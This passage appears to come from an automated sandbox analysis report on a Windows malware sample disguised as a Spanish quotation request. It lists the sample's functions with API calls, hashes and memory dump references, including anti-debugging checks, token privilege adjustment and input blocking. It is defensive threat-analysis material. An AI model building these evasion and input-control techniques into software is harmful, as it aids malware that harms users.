SetEvent.KERNEL32(?,?,00000000), ref: 0027CEFE

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: ef60408f67df442bcf124549817455ca74305361f6a73766c8018dd8f3941624
Instruction ID: 40a3799aa3728a2e44e42ab48651132b8b35ae23d68e7cf3879b2f355b1b7a95
Opcode Fuzzy Hash: ef60408f67df442bcf124549817455ca74305361f6a73766c8018dd8f3941624
Instruction Fuzzy Hash: 3021BDB1520706ABEB20DFA5D948BA6B7FCEF50314F20842EE64A92151E770EE548B64

Function 00232622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0023271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00232724
UnhandledExceptionFilter.KERNEL32(?), ref: 00232731

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a5fad59ce19c0776a29c247aecf3f6265b950eb8ff30a8a100e1ce29239474c0
Instruction ID: 175b198d0b54ddd57eb95c44ce6e2c2f6340899e342f4f7d011b7c0a3b0b990b
Opcode Fuzzy Hash: a5fad59ce19c0776a29c247aecf3f6265b950eb8ff30a8a100e1ce29239474c0
Instruction Fuzzy Hash: FA31B574911229ABCB21DF64EC8979DB7B8BF08310F5041EAE81CA7261E7709F958F45

Function 002751CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002751DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00275238
SetErrorMode.KERNEL32(00000000), ref: 002752A1

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 7ed8b8166d5d9fd347b97840701a5536efae56948fe01f84bcb9c1956df45642
Instruction ID: b47063a02b30b12762fe9c13b57225eb004c032e6209844cd1b62c2e941160f8
Opcode Fuzzy Hash: 7ed8b8166d5d9fd347b97840701a5536efae56948fe01f84bcb9c1956df45642
Instruction Fuzzy Hash: 21318075A10619DFDB00DF54D888EADBBF4FF08314F148099E809AB3A2CB71E855CB61

Function 002616C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0021FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00220668
Part of subcall function 0021FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00220685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0026170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0026173A
GetLastError.KERNEL32 ref: 0026174A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: cd551eb8567be61ec2b4917e36d6cdefd66d6fcb8d17843e4225439bdcffc478
Instruction ID: 9505c85377d909eb9d238a240f560d44e2511dd911f9ac68178231ef38f278f8
Opcode Fuzzy Hash: cd551eb8567be61ec2b4917e36d6cdefd66d6fcb8d17843e4225439bdcffc478
Instruction Fuzzy Hash: EA1191B2424305AFD7189F54ECC6DAAB7FDEB44714B24852EE05657241EB70BCA18B20

Function 0026D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0026D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0026D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0026D650

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 4a04c5385163d2548193428399d42e815e43863aebef412bfaa4f3c6a01e531f
Instruction ID: 8377aeb8b1299e901bfae99a478c98041547cd5adb0bd1664d48d7a2a082bd97
Opcode Fuzzy Hash: 4a04c5385163d2548193428399d42e815e43863aebef412bfaa4f3c6a01e531f
Instruction Fuzzy Hash: 3F118475E05228BFDB108F95EC49FAFBFBCEB45B50F208156F908E7290D6704A058BA1

Function 00261663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0026168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002616A1
FreeSid.ADVAPI32(?), ref: 002616B1

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 44400746c314a44b21695ec271bdfadd0fdd3ba4b8f58840392490ab24f5a9b0
Instruction ID: d8db1d0d108a6cd3b580b9b0d1e8b041f68479eb148c561b0f1c4920ed428b50
Opcode Fuzzy Hash: 44400746c314a44b21695ec271bdfadd0fdd3ba4b8f58840392490ab24f5a9b0
Instruction Fuzzy Hash: 06F0F475950309FBDB00DFE4DD89AAEBBBCEB08604F504565E501E2191E774AA548A50

Function 00224CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(002328E9,?,00224CBE,002328E9,002C88B8,0000000C,00224E15,002328E9,00000002,00000000,?,002328E9), ref: 00224D09
TerminateProcess.KERNEL32(00000000,?,00224CBE,002328E9,002C88B8,0000000C,00224E15,002328E9,00000002,00000000,?,002328E9), ref: 00224D10
ExitProcess.KERNEL32 ref: 00224D22

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8d2e686bf9d48ff451944051d3ee15c6a486f815e7a73de7d8b0c17119785020
Instruction ID: f31f16f49634838847a491df444bf2d251ed5f5aa7f012b978309fc07e3643f7
Opcode Fuzzy Hash: 8d2e686bf9d48ff451944051d3ee15c6a486f815e7a73de7d8b0c17119785020
Instruction Fuzzy Hash: 22E09271010158BBCB11BF94EE0AA583B69AB45B81B204055FC098A132CB35DA62CA94

Function 0023C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0023C36C

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 91ff2dcc790373d26a55f4b4a4e1689027600dcfe809016c70b06687ef5550d6
Instruction ID: b9b7e50f025246183afdbc077eef236286e8ff8747b0d8c32c1f59eee25af277
Opcode Fuzzy Hash: 91ff2dcc790373d26a55f4b4a4e1689027600dcfe809016c70b06687ef5550d6
Instruction Fuzzy Hash: A4416CB2910219AFCB24EFB9DC4CEBB7778EB84314F2042A9F905E7180E670AD50CB50

Function 0025D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0025D28C

Strings

X64, xrefs: 0025D2A8

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: f4c2832eeef81a9d7d986b25419eea609fc3c7c0d14a79ba4ea48994428c03fb
Instruction ID: 2108f4551cf6f1aa3cef5bc8a15689748afd6871d35a2640900a6ae333e02347
Opcode Fuzzy Hash: f4c2832eeef81a9d7d986b25419eea609fc3c7c0d14a79ba4ea48994428c03fb
Instruction Fuzzy Hash: F0D0C9B482511DEFCB90CB90EC88DDEB3BCBB14305F100152F506E2000D7B095488F20

Function 0022CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: e3c507fa5afdba5d94ef7283280647b1747e20863589cc71aff50f26374ba78a
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: DF023D71E10129AFDF14CFA9D9806ADFBF1EF48314F25416AD819E7384D731AA51CB80

Function 0020CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00250C40
p#-, xrefs: 0020CF7F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#-
API String ID: 0-336391000
Opcode ID: d92cacd29620d9d62f2747742e7477f1540e301ce7084d7963513f14a1a97bce
Instruction ID: d5710df6791532abb78029f175ab46fadb13570ab512456800e0066f1655429c
Opcode Fuzzy Hash: d92cacd29620d9d62f2747742e7477f1540e301ce7084d7963513f14a1a97bce
Instruction Fuzzy Hash: D2329CB092031ADBDF14DF90C885AEDB7B5FF05304F24415AE806AB2D2DB71AE69CB51

Function 002768EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00276918
FindClose.KERNEL32(00000000), ref: 00276961

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3f15ce5778ed4360c56ce2296d2189bf87421f98dad41055adf42a2b0ce93228
Instruction ID: e9bcf443694005d575a2debf81a2dcf6271b998ba1c14d9c89dd524453f51cec
Opcode Fuzzy Hash: 3f15ce5778ed4360c56ce2296d2189bf87421f98dad41055adf42a2b0ce93228
Instruction Fuzzy Hash: F511D071614601DFC710CF29D888A16BBE0FF84328F14C69AE9698F6A2CB30EC05CB91

Function 002737B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00284891,?,?,00000035,?), ref: 002737E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00284891,?,?,00000035,?), ref: 002737F4

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 8b8d1886517dbb21f4febd141f347084442352fc29c3fb4d02a75ee11065b2d9
Instruction ID: 9755b86fd64ed124af6ad8a0c80294710a17efc9c6c3566967deaaf374ba4c17
Opcode Fuzzy Hash: 8b8d1886517dbb21f4febd141f347084442352fc29c3fb4d02a75ee11065b2d9
Instruction Fuzzy Hash: 7AF0E5B1A143292AEB2057669C4DFEB7BAEEFC4761F000166F509D2282D9709944CAB0

Function 0026B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0026B25D
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0026B270

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 0bc4ea288e117efce7c4ca6592e052d8bc9f47467341112fb040aab8bc233c6d
Instruction ID: d5b5d43994a7484c8f84f62c7549b0bca8c6b19f9552925111c8e879fee0d7e9
Opcode Fuzzy Hash: 0bc4ea288e117efce7c4ca6592e052d8bc9f47467341112fb040aab8bc233c6d
Instruction Fuzzy Hash: 85F01D7181428EABDB059FA0D805BEE7BB4FF04305F10801AF955A5192D3798651DF94

Function 002610BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002611FC), ref: 002610D4
CloseHandle.KERNEL32(?,?,002611FC), ref: 002610E9

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 6cd229116c60091f520965d372efb6eec6517906e1ef4ef802353da2e27acb12
Instruction ID: d1d87a48abf19fce67c79a44b2b950b98f6c38020146cc892235817a9a0e9d0c
Opcode Fuzzy Hash: 6cd229116c60091f520965d372efb6eec6517906e1ef4ef802353da2e27acb12
Instruction Fuzzy Hash: 25E0BF72028611AEE7652B51FD09EB777E9EB04310F24882EF5A5804B1DB626CF0DB54

Function 0023676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00236766,?,?,00000008,?,?,0023FEFE,00000000), ref: 00236998

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: ee9956abc92a82466a7e15ef4c0dac404ad5417e614a8c3da3248d31fa72c17d
Instruction ID: 57f2964c0202b4eed30d01d21cd88f2640729a013884cf829c6b8bbb6c40747e
Opcode Fuzzy Hash: ee9956abc92a82466a7e15ef4c0dac404ad5417e614a8c3da3248d31fa72c17d
Instruction Fuzzy Hash: 31B17DB1620609EFD715CF28C48AB647BE4FF09364F25C658E899CF2A2C335D9A5CB40

Function 0021B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0025851F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 1ebb298d388e5596745a29918967fbb2affb455956f804fa875e06beba9a77e4
Instruction ID: 4e34c42dc4ccf22a6540ff7a190976bc360c04e16a47e7b9b53a9a8fe1935157
Opcode Fuzzy Hash: 1ebb298d388e5596745a29918967fbb2affb455956f804fa875e06beba9a77e4
Instruction Fuzzy Hash: BF128F719202299FDB25CF58C8806EEB7F5FF58310F14819AE809EB251EB709E95CF90

Function 0027EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0027EABD

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: d6efd647adadcde522955ede0652643037c9020c8d653b7b44321484b29acbd1
Instruction ID: 127ea2d72cea27f071e6b57e7015f05bcac37c05c5c57bd04ee99293d9857a1a
Opcode Fuzzy Hash: d6efd647adadcde522955ede0652643037c9020c8d653b7b44321484b29acbd1
Instruction Fuzzy Hash: ABE012712202059FC710DF59D804D5AB7D9AF98760F118456FC49C7291DA70E8508BA1

Function 002209D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,002203EE), ref: 002209DA

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 02470db930c495d5e270ae193fe86c8c445a0bb3d0c28595abe5fb1437522263
Instruction ID: 02d9af1e46af3c11420e80196b0d448b43e8d2f0f805d5443aa388ecd266ec9c
Opcode Fuzzy Hash: 02470db930c495d5e270ae193fe86c8c445a0bb3d0c28595abe5fb1437522263
Instruction Fuzzy Hash:

Function 0022781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0022798B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
